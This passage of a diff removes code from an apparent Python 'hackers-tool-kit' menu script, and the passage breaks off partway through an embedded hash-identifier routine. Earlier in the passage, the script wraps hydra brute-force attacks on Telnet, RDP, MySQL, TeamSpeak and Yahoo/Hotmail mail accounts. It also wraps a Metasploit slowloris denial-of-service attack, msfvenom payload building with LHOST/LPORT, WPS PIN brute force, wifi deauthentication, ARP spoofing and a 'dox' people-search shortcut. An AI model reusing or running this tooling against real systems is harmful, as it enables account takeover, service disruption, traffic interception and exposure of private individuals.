iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and 